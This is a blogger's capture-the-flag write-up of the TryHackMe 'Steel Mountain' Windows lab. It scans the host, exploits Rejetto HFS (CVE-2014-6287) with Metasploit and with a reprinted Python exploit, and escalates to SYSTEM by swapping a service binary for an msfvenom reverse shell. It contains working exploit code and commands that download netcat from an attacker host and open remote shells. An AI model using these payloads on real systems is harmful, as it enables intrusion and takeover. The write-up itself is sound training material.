Steel Mountain writeup [thm]
![Steel Mountain pic](../../images/steelmountain.jpg)
Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.
Steel Mountain is the first challenge in the Advanced Exploitation section of the Offensive Pentesting path.
This posts contains some spoilers.
Let's get started!
Introduction
In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.
Who is the employee of the month?
Visit $target in a web browser. There's our employee of the month. If you don't recognize this man, have a look at the filename or do a reverse image search.
“Think about it [REDACTED]. If you died, would anyone care? Would they really care? Maybe they’d cry for a day, but let’s be honest. No one would give a shit. They wouldn’t. The few people who would feel obligated to go to your funeral would probably feel annoyed and leave as soon as possible. That’s who you are. That’s what you are. You’re nothing to anyone. To everyone. Think about it, [REDACTED], cause if you do, if you let yourself. You know I’m telling you the truth, so instead of wasting anymore of my time, I need you to go call someone that matters. Because [REDACTED], you don’t.”
😿
Task 2 Initial Access
Now you have deployed the machine, lets get an initial shell!
Scan the machine with nmap. What is the other port running a web server on?
$: nmap -p- $target Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 15:55 CEST Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Nmap scan report for $target Host is up (0.051s latency). Not shown: 65520 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5985/tcp open wsman 8080/tcp open http-proxy 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49164/tcp open unknown 49165/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 113.56 seconds
The answer is easy to figure out.
Take a look at the other web server. What file server is running?
Server information HttpFileServer 2.3 Server time: 5/23/2021 6:59:01 AM Server uptime: 00:09:02
With a link to http://www.rejetto.com/hfs/.
This Rejetto HFS probably has a vulnerability we will exploit to gain initial access to the machine.
What is the CVE number to exploit this file server?
$: searchsploit hfs ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service | osx/dos/29454.txt Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service) | osx/dos/12375.c Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure | osx/local/35488.c Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation | osx/local/8266.txt FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution | windows/remote/37985.py HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) | windows/remote/49584.py HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service | linux/dos/28895.txt Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | windows/remote/34926.rb Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | windows/remote/31056.py Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
Given that we know that we are going to use Metasploit it's not hard to find the right one. We can look in Exploit-DB for some more info on the exploit: Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)
EDB-ID: 34926 CVE: [REDACTED]
Use Metasploit to get an initial shell. What is the user flag?
$: msfconsole init [!] The following modules could not be loaded!..| [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go [!] Please see /home/[REDACTED]/.msf4/logs/framework.log for details. `:oDFo:` ./ymM0dayMmy/. -+dHJ5aGFyZGVyIQ==+- `:sm⏣~~Destroy.No.Data~~s:` -+h2~~Maintain.No.Persistence~~h+- `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:` ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/. -++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+- -~/.ssh/id_rsa.Des- `htN01UserWroteMe!- :dopeAW.No<nano>o :is:TЯiKC.sudo-.A: :we're.all.alike'` The.PFYroy.No.D7: :PLACEDRINKHERE!: yxp_cmdshell.Ab0: :msf>exploit -j. :Ns.BOB&ALICEes7: :---srwxrwx:-.` `MS146.52.No.Per: :<script>.Ac816/ sENbove3101.404: :NT_AUTHORITY.Do `T:/shSYSTEM-.N: :09.14.2011.raid /STFU|wall.No.Pr: :hevnsntSurb025N. dNVRGOING2GIVUUP: :#OUTHOUSE- -s: /corykennedyData: :$nmap -oS SSo.6178306Ence: :Awsm.da: /shMTl#beats3o.No.: :Ring0: `dDestRoyREXKC3ta/M: :23d: sSETEC.ASTRONOMYist: /- /yo- .ence.N:(){ :|: & };: `:Shall.We.Play.A.Game?tron/ ```-ooy.if1ghtf0r+ehUser5` ..th3.H1V3.U2VjRFNN.jMh+.` `MjM~~WE.ARE.se~~MMjMs +~KANSAS.CITY's~-` J~HAKCERS~./.` .esc:wq!:` +++ATH` ` =[ metasploit v6.0.36-dev ] + -- --=[ 2106 exploits - 1131 auxiliary - 357 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ] Metasploit tip: To save all commands executed since start up to a file, use the makerc command
Then we search for the exploit:
msf6 > search Rejetto HTTP File Server Matching Modules ================ i Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
Use it!
msf6 exploit(windows/http/rejetto_hfs_exec) > use exploit/windows/http/rejetto_hfs_exec [*] Using configured payload windows/meterpreter/reverse_tcp
Let's have a look at the options.
msf6 exploit(windows/http/rejetto_hfs_exec) > options Module options (exploit/windows/http/rejetto_hfs_exec): Name Current Setting Required Description ---- --------------- -------- ----------- HTTPDELAY 10 no Seconds to wait before terminating web server Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 8080 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes The path of the web application URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST [REDACTED] yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
We need to set RHOSTS, SRVHOST(?) and LHOST which was set to my real local 192.169.x.x address. Both the port number and the path on the target and all the other required options looks fine.
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS $target RHOSTS => $target msf6 exploit(windows/http/rejetto_hfs_exec) > set SRVHOST tun0 SRVHOST => tun0 msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST tun0 LHOST => tun0
We are now ready to pwn this machine.
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit [*] Started reverse TCP handler on $tunip:4444 [*] Using URL: http://$tunip:8080/hKz2pL [*] Server started. [*] Sending a malicious request to / /usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete /usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete [*] Payload request received: /hKz2pL [*] Sending stage (175174 bytes) to $target [*] Meterpreter session 1 opened ($tunip:4444 -> $target:49188) at 2021-05-23 16:57:07 +0200 [!] Tried to delete %TEMP%\FgXtiY.vbs, unknown result [*] Server stopped. meterpreter >
We're in! Let's grab the user flag.
meterpreter > pwd C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup meterpreter > cd c:\users\bill meterpreter > cd Desktop meterpreter > ls Listing: C:\Users\bill\Desktop ============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 282 fil 2019-09-27 13:07:07 +0200 desktop.ini 100666/rw-rw-rw- 70 fil 2019-09-27 14:42:38 +0200 user.txt meterpreter > cat user.txt [REDACTED]
It is done.
Privilege Escalation
Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!
To enumerate this machine, we will use a powershell script called PowerUp, that's purpose is to evaluate a Windows machine and determine any abnormalities - "PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations."
You can download the script here. Now you can use the upload command in Metasploit to upload the script.
First we download the script to our local machine.
$: wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
Then we upload it to our target.
meterpreter > upload PowerUp.ps1 [*] uploading : /home/[REDACTED]/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1 [*] Uploaded 483.26 KiB of 483.26 KiB (100.0%): /home/[REDACTED]/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1 [*] uploaded : /home/[REDACTED]/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1 meterpreter > ls Listing: C:\Users\bill\Desktop ============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 494860 fil 2021-05-23 17:23:12 +0200 PowerUp.ps1 100666/rw-rw-rw- 282 fil 2019-09-27 13:07:07 +0200 desktop.ini 100666/rw-rw-rw- 70 fil 2019-09-27 14:42:38 +0200 user.txt
We execute the following to command to get a PowerShell... shell.
meterpreter > load powershell Loading extension powershell...Success. meterpreter > powershell_shell
PS > dir Directory: C:\Users\bill\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 5/23/2021 8:23 AM 494860 PowerUp.ps1 -a--- 9/27/2019 5:42 AM 70 user.txt
We run the script:
PS > . .\PowerUp.ps1 PS > Invoke-AllChecks ServiceName : AdvancedSystemCareService9 Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath> CanRestart : True Name : AdvancedSystemCareService9 Check : Unquoted Service Paths ServiceName : AdvancedSystemCareService9 Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath> CanRestart : True Name : AdvancedSystemCareService9 Check : Unquoted Service Paths ServiceName : AdvancedSystemCareService9 Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath> CanRestart : True Name : AdvancedSystemCareService9 Check : Unquoted Service Paths ServiceName : AdvancedSystemCareService9 Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath> CanRestart : True Name : AdvancedSystemCareService9 Check : Unquoted Service Paths ServiceName : AWSLiteAgent Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath> CanRestart : False Name : AWSLiteAgent Check : Unquoted Service Paths ServiceName : AWSLiteAgent Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath> CanRestart : False Name : AWSLiteAgent Check : Unquoted Service Paths ServiceName : IObitUnSvr Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath> CanRestart : False Name : IObitUnSvr Check : Unquoted Service Paths ServiceName : IObitUnSvr Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath> CanRestart : False Name : IObitUnSvr Check : Unquoted Service Paths ServiceName : IObitUnSvr Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath> CanRestart : False Name : IObitUnSvr Check : Unquoted Service Paths ServiceName : IObitUnSvr Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath> CanRestart : False Name : IObitUnSvr Check : Unquoted Service Paths ServiceName : LiveUpdateSvc Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath> CanRestart : False Name : LiveUpdateSvc Check : Unquoted Service Paths ServiceName : LiveUpdateSvc Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath> CanRestart : False Name : LiveUpdateSvc Check : Unquoted Service Paths ServiceName : LiveUpdateSvc Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe; IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath> CanRestart : False Name : LiveUpdateSvc Check : Unquoted Service Paths ServiceName : AdvancedSystemCareService9 Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe ModifiableFile : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...} ModifiableFileIdentityReference : STEELMOUNTAIN\bill StartName : LocalSystem AbuseFunction : Install-ServiceBinary -Name 'AdvancedSystemCareService9' CanRestart : True Name : AdvancedSystemCareService9 Check : Modifiable Service Files ServiceName : IObitUnSvr Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe ModifiableFile : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...} ModifiableFileIdentityReference : STEELMOUNTAIN/bill StartName : LocalSystem AbuseFunction : Install-ServiceBinary -Name 'IObitUnSvr' CanRestart : False Name : IObitUnSvr Check : Modifiable Service Files ServiceName : LiveUpdateSvc Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe ModifiableFile : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...} ModifiableFileIdentityReference : STEELMOUNTAIN/bill StartName : LocalSystem AbuseFunction : Install-ServiceBinary -Name 'LiveUpdateSvc' CanRestart : False Name : LiveUpdateSvc Check : Modifiable Service Files
Take close attention to the CanRestart option that is set to true. What is the name of the name of the service which shows up as an unquoted service path vulnerability?
The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!
AdvancedSystemCareService9 looks promising:
ServiceName : AdvancedSystemCareService9 Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath> CanRestart : True Name : AdvancedSystemCareService9 Check : Unquoted Service Paths
Use msfvenom to generate a reverse shell as an Windows executable.
$: msfvenom -p windows/shell_reverse_tcp LHOST=$tunip LPORT=1234 -e x86/shikata_ga_nai -f exe -o ASCService.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 351 (iteration=0) x86/shikata_ga_nai chosen with final size 351 Payload size: 351 bytes Final size of exe file: 73802 bytes Saved as: ASCService.exe
Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.
Note: The service showed up as being unquoted (and could be exploited using this technique), however, in this case we have exploited weak file permissions on the service files instead.
meterpreter > upload ASCService.exe [*] uploading : /home/[REDACTED]/tryhackme/steel_mountain/ASCService.exe -> ASCService.exe [*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/[REDACTED]/tryhackme/steel_mountain/ASCService.exe -> ASCService.exe [*] uploaded : /home/[REDACTED]/tryhackme/steel_mountain/ASCService.exe -> ASCService.exe
First, we shut down AdvancedSystemCareService9.
C:\Users\bill\Desktop>sc stop AdvancedSystemCareService9 sc stop AdvancedSystemCareService9 SERVICE_NAME: AdvancedSystemCareService9 TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 4 RUNNING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
Now, replace ASCService.exe with our malicious impostor program.
C:\Users\bill\Desktop> copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe" Overwrite \Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe? (Yes/No/All): Y Y 1 file(s) copied.
Start a listener on our local machine.
$: nc -nlvp 1234
Then restart the AdvancedSystemCareService9.
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9 sc start AdvancedSystemCareService9 [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion.
That doesn't sound very promising but when we check in on our listener we got a shell and not any plain old shell, we got root.
C:\Program Files (x86)\IObit> C:\Program Files (x86)\IObit>whoami whoami nt authority\system C:\Windows\System32>cd C:\Users\Administrator\Desktop\ cd C:\Users\Administrator\Desktop\ C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 2E4A-906A Directory of C:\Users\Administrator\Desktop 10/12/2020 12:05 PM <DIR> . 10/12/2020 12:05 PM <DIR> .. 10/12/2020 12:05 PM 1,528 activation.ps1 09/27/2019 05:41 AM 32 root.txt 2 File(s) 1,560 bytes 2 Dir(s) 44,155,334,656 bytes free C:\Users\Administrator\Desktop>more root.txt more root.txt [REDACTED]
Access and Escalation Without Metasploit
Now let's complete the room without the use of Metasploit.
For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to
To begin we shall be using the same CVE. However, this time let's use this exploit.
Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!
To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub! You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!
The exploit is a short script written in Python2.
#!/usr/bin/python # Exploit Title: HttpFileServer 2.3.x Remote Command Execution # Google Dork: intext:"httpfileserver 2.3" # Date: 04-01-2016 # Remote: Yes # Exploit Author: Avinash Kumar Thapa aka "-Acid" # Vendor Homepage: http://rejetto.com/ # Software Link: http://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Windows Server 2008 , Windows 8, Windows 7 # CVE : CVE-2014-6287 # Description: You can use HFS (HTTP File Server) to send and receive files. # It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. # It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. #Usage : python Exploit.py <Target IP address> <Target Port Number> #EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). # You may need to run it multiple times for success! import urllib2 import sys try: def script_create(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") def execute_script(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") def nc_run(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") ip_addr = "$tunip" #local IP address local_port = "443" # Local Port number # Updated Line vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%3A8080%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" save= "save|" + vbs vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" exe= "exec|"+vbs2 vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port exe1= "exec|"+vbs3 script_create() execute_script() nc_run() except: print """[.]Something went wrong..! Usage is :[.] python exploit.py <Target IP address> <Target Port Number> Don't forgot to change the Local IP address and Port number on the script"""
The vbs line was changed in the script according this.
To start things off, download the netcat static binary and change its name to nc.exe to conform with the exploit. Then serve it up by executing the following while standing in the same directory where you have the netcat binary.
$: python3 -m http.server 8080
Also start listening on port 443.
$: sudo rlwrap nc -nlvp 443 listening on [any] 443 ...
Now it's time to try out the exploit.
$: python2 exploit.py $target 8080
No output but in the Python web server we see that we got a GET request for the netcat binary.
$target - - [23/May/2021 19:00:54] "GET /nc.exe HTTP/1.1" 200 -
Looks good!
And in the listener we see something that should make us smile.
connect to [$tunip] from (UNKNOWN) [$target] 49391 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
We are in!
Congratulations, we're now onto the system. Now we can pull winPEAS to the system using powershell -c.
Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.
What powershell -c command could we run to manually find out the service name?
powershell -c "Get-Service"
Now let's escalate to Administrator with our new found knowledge.
Generate your payload using msfvenom and pull it to the system using powershell.
Format is "powershell -c "command here"
Download the winPEAS script to web server directory.
$: wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat
Make sure that the Python web server is up and running.
cd C:\Users\bill\Desktop C:\Users\bill\Desktop> powershell -c "Invoke-WebRequest -Uri 'http://$tunip:8080/winPEAS.bat' -OutFile 'C:\Users\bill\Desktop\winPEAS.bat'"
In the web server we see a GET request.
$target - - [07/Feb/2021 22:27:52] "GET /winPEAS.bat HTTP/1.1" 200 -
dir Volume in drive C has no label. Volume Serial Number is 2E4A-906A Directory of C:\Users\bill\Desktop 05/23/2021 10:11 AM <DIR> . 05/23/2021 10:11 AM <DIR> .. 05/23/2021 09:05 AM 73,802 ASCService.exe 05/23/2021 08:28 AM 494,731 PowerUp.ps1 09/27/2019 05:42 AM 70 user.txt 05/23/2021 10:11 AM 35,107 winPEAS.bat 4 File(s) 603,710 bytes 2 Dir(s) 44,150,620,160 bytes free
It worked. Let's run winPEAS.bat.
winPEAS.bat ((,.,/((((((((((((((((((((/, */ [+] SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe STEELMOUNTAIN\bill:(I)(RX,W) C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe NT AUTHORITY\SYSTEM:(I)(F) C:\Program Files\Amazon\XenTools\LiteAgent.exe NT AUTHORITY\SYSTEM:(I)(F) ...
A very long and familiar output. Since we did all this before and know what to do there is no need to go through it again.
Time to bake up some malicious code.
$: msfvenom -p windows/shell_reverse_tcp LHOST=$tunip LPORT=1234 -e x86/shikata_ga_nai -f exe -o ASCService.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 351 (iteration=0) x86/shikata_ga_nai chosen with final size 351 Payload size: 351 bytes Final size of exe file: 73802 bytes Saved as: ASCService.exe
Start a listener.
$: nc -nlvp 1234 listening on [any] 1234 ...
Stop AdvancedSystemCareService9.
sc stop AdvancedSystemCareService9
Upload and replace ASCService.exe.
powershell -c "Invoke-WebRequest -Uri 'http://$tunip:8080/Advanced.exe' -OutFile 'C:/Program Files (x86)/IObit/Advanced.exe'"
Finally, start AdvancedSystemCareService9.
sc start AdvancedSystemCareService9
In our listener:
connect to [$tunip] from (UNKNOWN) [$target] 49431 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>
Conclusion
Phew! This was not not easy for me. I had to lean quite a bit on Zach Heller's writeup of this room for some tasks.
My lack of Windows know-how and particular Powershell skills crippled me in this challenge. Need more experience.
I realized early on that it would take me a long time to solve this on my own so I took the liberty of doing some googling and decided to make this a learning experience instead of a challenge.
It felt a bit like copy-paste "hacking" but it feels like I acquired new skills and experience along the way. I think a similar challenge would be a lot easier for me now.
The exploits were easy enough to understand and while I cheated I feel that I understand everything reasonably well in hindsight. I try my best to not just copy commands and get the flags but instead understand what I'm doing and why.
These themed challenges... While it's fun and flashy, hacking is in essence dry and "boring" so these themes at times feels a little forced. Sometimes it works well but when the theme consists of some usernames and a front page on a web server, I don't know...
Metasploit
One good thing is that I' m getting more and more comfortable using Metasploit!
Speaking of which, Metasploit is not supported in Pygments and I'm not completely happy with the current output using console but it will have to be good enough for now.
One major annoyance is that I couldn't get the windows/meterpreter/reverse_tcp payload working while using the windows/http/rejetto_hfs_exec exploit so I had to start a netcat listener outside of Metasploit and then it worked just fine. It would have been nice to solve the first part of this challenge completely inside Metasploit and the most annoying part is that I have no idea why this didn't work.
Offensive Pentesting path
Since I decided to write a blog post on every room in the Offensive Pentesting path I had to re-do the challenges up to and including Steel Mountain.
While re-doing challenges probably is very beneficial for your learning it's not that much fun. But now I'm at last up to speed so on to some new challenges!
More to come.
Tools used
- (Firefox)
- Nmap
- Searchsploit/Exploit-DB
- Metasploit
- Rejetto HTTP File Server (HFS) RCE exploit for Metasploit (exploit/windows/http/rejetto_hfs_exec)
- PowerShell
- PowerUp.ps1
- MSFvenom
- Netcat
- Rejetto HTTP File Server (HFS) 2.3.x - RCE (2) Python script
- Python (python3 -m http.server 8080)
- winPEAS
- rlwrap